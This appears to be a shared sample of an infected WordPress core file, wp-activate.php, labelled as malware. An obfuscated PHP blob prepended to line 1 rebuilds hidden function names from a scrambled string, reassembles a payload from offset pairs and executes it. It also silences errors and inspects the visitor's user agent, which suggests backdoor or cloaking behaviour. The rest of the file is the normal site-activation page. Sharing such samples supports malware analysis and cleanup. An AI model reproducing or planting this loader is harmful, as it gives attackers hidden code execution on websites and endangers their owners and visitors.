$cnajwp - wordpress malware

1. <?php $ocnajwp = 'K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(57]y86]267]y74]275]y7:]268]y7f#<!%tww!>!   x2400~:<h%)rrd/#00;quui#>.%!<***f   x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof.))1/35.)1/14+9**-)1/2986+7**^/7-K)ebfsX  x27u%)7fmjix6<C x27&6<*rfs%7-K)fu24/%tjw/   x24)%   x24-    x24y4   x24-    x24)hopm3qjA)qj3hopmA   x273qj%6<uhA)3of>2bd%!<5h%/#0#/*#npd/#/},;#-#}+;%-qp%)54l}  x27;%!<*#}_;#)323ldfid>}&;!osvufs}  x7f;!jsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#    x27rfs%6~6<-C)fepmqnjA  x27&6<.fmjgA    x27n)-1);} @error_reporting(0)-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bV;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;z<%j=tj{fpg)%    x24-    x24*<tfs%w6<    x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR   x2:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj%:<**#57]38y]47]67y]37]88y]27]28y]#6*CW&)7gj6<.[A    x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/X>b%Z<#opo#>b%!*##>>X)!gjZopjudovg)!gj!|!*msv%)}k~~~<%rx<~!!%s:N}#-%o:W%c:>1<%b:>1   157 x6e"; function 56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{trstr($uas,"  x6d 163 x69 153Ld]53]Kc]55Ld]55#*<%bG9}:}.}]y8  x24-    x24]26  x24-    x24<%   x24-    x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24t166 x3a 61  x31")) or (strs!ftmbg)!gj<*#k#)usbut`cpV    x7f x7f; $amdioeu = implode(array_map("nwausli",str_split("%tjw!>!#]y84/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvrccjt("", $amdioeu); $wckadkh();}}gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%bT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##QtpGLOBALS["   x61 156 x75 156 x61:-111112)eobs`un>qp%!|Z~!tr($uas,"   x61 156 x64 162 x6f 151 x64"))) { $iiacctutjyf`4    x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!oV,6<*)ujojR  x27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fwtuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSdoj%6< x7fw6*  x7f_*#fmjgk4`{6~6*9.-j%-bubE{h%)sutcvt)fubmgoj{hA!<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")));$wckadkh = $iiavg  x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jc:649#-!#:618d5f9#-!#fFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b% x7f!<fepdof./#@#/qp%>5h%!<*:::::tmw/    x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[z)#]341]88M4P8]37]278]p!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%<!~! x24/%t2w/   x24)##-!#~<#/%  x24-    x24!>!fyqmpe,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;h^W%c!>!%i  x5c2^<!Ce*[!%cIjQeTQcOc23ldfidk!~!<**qp%!-uyfu%)3of)if((function_exists("   x6f 142 x5f 163 x74 141 x72 164") && (!isset($6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!   x24/%j!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudopjudovg<~   x24<!%o:!>! x242178}527}86* x7f_*#fubfsdXk5`{66~6<&w6<  x7fw6*CW&)7gj6<*doj%76d]281Ld]245]K2]285]Ke]m6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**11112osvufs!~<3,j%>j%!*3!  x27!"])))) { $GLOBALS[" x61 156 x75 156 xsdXA   x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%<##!>!2p%!|!*!***b%)sfxpmpusut! x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)uj,,*!|    x24-    x24gvodujpo!    x24-    x*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#   x5cq%7/7#@#7j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!!/!#0#)idubn`hfsq)!sf)# x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/r%/h%)n%-#+I#)q%:>:r%:|:**t%)52]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]18dz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]yvctus)% x24-    x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*  x24-    x24!>!  xm%=*h%)m%):fmjix:<##:>:h%:<#64y]5nwausli($n){return chr(ord($!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gl;33bq}k;opjudovg}x;0]=#    x5cq%)ufttj x22)gj6<^#Y#    x5cq%   /#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44e<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:  x5c%!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hX;!sp!*#opo#>>}R;msv}.;/#/#24y7 x24-    x24*<!  x24-    x24gps)%j>16<Cw6<pd%w6Z6<.5`hA  x27pd%6<pd%w6Z6<.4`hA   x27pd%6<p66~67<&w6<*&7-#o]s]o]s]#)fepmqyf   x27*&7-n%)utj>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z    x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpq!#-%tmw)%tww**WYsboepn)%bs#o]#/*)323zbe!-#jt0*?]+^?]_   x5c}X   x24<!%tmw!>!#]y84]275svufs!*!+A!>!{e%)!>>   x22<#opo#>b%!**X)ufttj  x22)gj!|!*nbsbq%)3ftmbg!osvufs!|ftmf!~<*    x27!hmg%)!gj!|!*1?hmg%)!/%tmw/  x24)%c*W%eN+#Qi x5c145")) or (strstr($uas," x72 VD!-id%)uqpuft`msvd},;uqpuhnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)4]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))Rb%))!gj!<*#cd2bge56+99386c6f+9f5d81225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]8y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:odfoopdXA   x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfOh/#00#W~!%t2w)##Qtjw)#]82#-#7tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MS]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]2])0#)U!    x27{**u%-#jt061"]=1; $uas=strtolower($_SERVER["!opjudovg}{;#)tutjyf`    x48 124 x54 120 x5f 1epc}A;~!}  x7f;!|!}{;)gj}_t%:osvufs:~:<*9-1-r%)s%>/hopjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]Kw%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66*3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!s-%rxB%h>#]y31]278]y3e]81]K78:56985fepdof`57ftbc   x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281Lx27Y%6<.msv`ftsbqA7>q%6<    x7fw+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnjft`msvd}+;!>!}  x27;!>>>!}_;gvc%}&;fthmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!sut>j%!*9!    x27!hmg%)!gj!~<ofmy%,3,j%>j%!<*d%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{  x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*XAZASV<*]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!   x246767~8:}334}472  x24<!%ff2!>!bssbz)  x24]253]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]2825 x53 105 x52 137 x41 107 x45 116 x54"]); if ((s>2<!%ww2)%w`TW~   x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}t)!gj!<*2bd%-#1GO    x22#)fepmqyfA>2b%!<*qp%-*.%)ejt = " x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x69mbg} x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;h6:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGSTrrEvxNoITCnuF_EtaeRCxECaLPer_RtSpfgorzr'; $dqxhjas=explode(chr((662-542)),substr($ocnajwp,(31371-25445),(129-95))); $nqdxtk = $dqxhjas[0]($dqxhjas[(3-2)]); $ptqlbjlj = $dqxhjas[0]($dqxhjas[(14-12)]); if (!function_exists('syywon')) { function syywon($bfxyyl, $bgctdd,$wckvojtnm) { $pzvhxso = NULL; for($owybomp=0;$owybomp<(sizeof($bfxyyl)/2);$owybomp++) { $pzvhxso .= substr($bgctdd, $bfxyyl[($owybomp*2)],$bfxyyl[($owybomp*2)+(6-5)]); } return $wckvojtnm(chr((59-50)),chr((545-453)),$pzvhxso); }; } $nolfdfex = explode(chr((139-95)),'2308,68,1490,29,2684,37,4509,34,4564,22,5468,49,1070,26,3981,28,1203,26,1544,50,5755,58,1003,20,3246,28,485,27,1262,64,5300,65,3571,51,5188,59,3622,46,2609,50,199,43,394,63,2797,35,4286,53,2721,45,276,28,2863,46,1326,51,3339,33,4996,29,2535,51,457,28,1773,31,604,53,4368,65,1654,58,821,69,1712,61,4009,26,5065,36,5813,43,4543,21,947,27,3907,22,1804,33,2659,25,5101,45,3727,37,5146,42,4800,49,3929,25,1410,40,3274,42,2445,55,1891,66,5708,47,304,29,106,64,2031,27,1519,25,2766,31,749,37,5025,40,2961,20,2118,40,4145,37,5856,70,1979,52,921,26,3869,38,2279,29,4884,60,3511,27,333,61,4637,43,1023,47,4035,58,1594,60,3845,24,1229,33,5247,53,4744,56,2205,41,5654,54,544,38,4586,24,3316,23,4488,21,890,31,3790,25,3815,30,4433,55,55,51,4610,27,786,35,3021,30,3213,33,3051,57,4234,52,2500,35,5365,36,1152,51,3146,67,242,34,1126,26,2832,31,3538,33,582,22,2158,47,2981,40,3954,27,2246,33,3372,37,1957,22,2376,69,2058,38,3479,32,4339,29,3764,26,4849,35,657,58,715,34,4680,64,4944,52,5587,67,3108,38,2586,23,1096,30,512,32,1450,40,2096,22,4182,52,5401,67,4093,52,170,29,974,29,3409,70,2909,52,3668,59,5517,70,0,55,1837,54,1377,33'); $rfxpntu = $nqdxtk("",syywon($nolfdfex,$ocnajwp,$ptqlbjlj)); $nqdxtk=$ocnajwp; $rfxpntu(""); $rfxpntu=(687-566); $ocnajwp=$rfxpntu-1; ?><?php
2. /**
3.  * Confirms that the activation key that is sent in an email after a user signs
4.  * up for a new site matches the key for that user and then displays confirmation.
5.  *
6.  * @package WordPress
7.  */
8.  
9. define( 'WP_INSTALLING', true );
10.  
11. /** Sets up the WordPress Environment. */
12. require( dirname(__FILE__) . '/wp-load.php' );
13.  
14. require( dirname( __FILE__ ) . '/wp-blog-header.php' );
15.  
16. if ( !is_multisite() ) {
17.     wp_redirect( wp_registration_url() );
18.     die();
19. }
20.  
21. if ( is_object( $wp_object_cache ) )
22.     $wp_object_cache->cache_enabled = false;
23.  
24. // Fix for page title
25. $wp_query->is_404 = false;
26.  
27. /**
28.  * Fires before the Site Activation page is loaded.
29.  *
30.  * @since 3.0.0
31.  */
32. do_action( 'activate_header' );
33.  
34. /**
35.  * Adds an action hook specific to this page that fires on wp_head
36.  *
37.  * @since MU
38.  */
39. function do_activate_header() {
40.     /**
41.      * Fires before the Site Activation page is loaded, but on the wp_head action.
42.      *
43.      * @since 3.0.0
44.      */
45.     do_action( 'activate_wp_head' );
46. }
47. add_action( 'wp_head', 'do_activate_header' );
48.  
49. /**
50.  * Loads styles specific to this page.
51.  *
52.  * @since MU
53.  */
54. function wpmu_activate_stylesheet() {
55.     ?>
56.     <style type="text/css">
57.         form { margin-top: 2em; }
58.         #submit, #key { width: 90%; font-size: 24px; }
59.         #language { margin-top: .5em; }
60.         .error { background: #f66; }
61.         span.h3 { padding: 0 8px; font-size: 1.3em; font-weight: bold; }
62.     </style>
63.     <?php
64. }
65. add_action( 'wp_head', 'wpmu_activate_stylesheet' );
66.  
67. get_header( 'wp-activate' );
68. ?>
69.  
70. <div id="signup-content" class="widecolumn">
71.     <div class="wp-activate-container">
72.     <?php if ( empty($_GET['key']) && empty($_POST['key']) ) { ?>
73.  
74.         <h2><?php _e('Activation Key Required') ?></h2>
75.         <form name="activateform" id="activateform" method="post" action="<?php echo network_site_url('wp-activate.php'); ?>">
76.             <p>
77.                 <label for="key"><?php _e('Activation Key:') ?></label>
78.                 <br /><input type="text" name="key" id="key" value="" size="50" />
79.             </p>
80.             <p class="submit">
81.                 <input id="submit" type="submit" name="Submit" class="submit" value="<?php esc_attr_e('Activate') ?>" />
82.             </p>
83.         </form>
84.  
85.     <?php } else {
86.  
87.         $key = !empty($_GET['key']) ? $_GET['key'] : $_POST['key'];
88.         $result = wpmu_activate_signup( $key );
89.         if ( is_wp_error($result) ) {
90.             if ( 'already_active' == $result->get_error_code() || 'blog_taken' == $result->get_error_code() ) {
91.                 $signup = $result->get_error_data();
92.                 ?>
93.                 <h2><?php _e('Your account is now active!'); ?></h2>
94.                 <?php
95.                 echo '<p class="lead-in">';
96.                 if ( $signup->domain . $signup->path == '' ) {
97.                     printf( __('Your account has been activated. You may now <a href="%1$s">log in</a> to the site using your chosen username of &#8220;%2$s&#8221;. Please check your email inbox at %3$s for your password and login instructions. If you do not receive an email, please check your junk or spam folder. If you still do not receive an email within an hour, you can <a href="%4$s">reset your password</a>.'), network_site_url( 'wp-login.php', 'login' ), $signup->user_login, $signup->user_email, wp_lostpassword_url() );
98.                 } else {
99.                     printf( __('Your site at <a href="%1$s">%2$s</a> is active. You may now log in to your site using your chosen username of &#8220;%3$s&#8221;. Please check your email inbox at %4$s for your password and login instructions. If you do not receive an email, please check your junk or spam folder. If you still do not receive an email within an hour, you can <a href="%5$s">reset your password</a>.'), 'http://' . $signup->domain, $signup->domain, $signup->user_login, $signup->user_email, wp_lostpassword_url() );
100.                 }
101.                 echo '</p>';
102.             } else {
103.                 ?>
104.                 <h2><?php _e('An error occurred during the activation'); ?></h2>
105.                 <?php
106.                 echo '<p>'.$result->get_error_message().'</p>';
107.             }
108.         } else {
109.             $url = isset( $result['blog_id'] ) ? get_blogaddress_by_id( (int) $result['blog_id'] ) : '';
110.             $user = get_userdata( (int) $result['user_id'] );
111.             ?>
112.             <h2><?php _e('Your account is now active!'); ?></h2>
113.  
114.             <div id="signup-welcome">
115.                 <p><span class="h3"><?php _e('Username:'); ?></span> <?php echo $user->user_login ?></p>
116.                 <p><span class="h3"><?php _e('Password:'); ?></span> <?php echo $result['password']; ?></p>
117.             </div>
118.  
119.             <?php if ( $url && $url != network_home_url( '', 'http' ) ) :
120.                 switch_to_blog( (int) $result['blog_id'] );
121.                 $login_url = wp_login_url();
122.                 restore_current_blog();
123.                 ?>
124.                 <p class="view"><?php printf( __( 'Your account is now activated. <a href="%1$s">View your site</a> or <a href="%2$s">Log in</a>' ), $url, esc_url( $login_url ) ); ?></p>
125.             <?php else: ?>
126.                 <p class="view"><?php printf( __('Your account is now activated. <a href="%1$s">Log in</a> or go back to the <a href="%2$s">homepage</a>.' ), network_site_url('wp-login.php', 'login'), network_home_url() ); ?></p>
127.             <?php endif;
128.         }
129.     }
130.     ?>
131.     </div>
132. </div>
133. <script type="text/javascript">
134.     var key_input = document.getElementById('key');
135.     key_input && key_input.focus();
136. </script>
137. <?php get_footer( 'wp-activate' );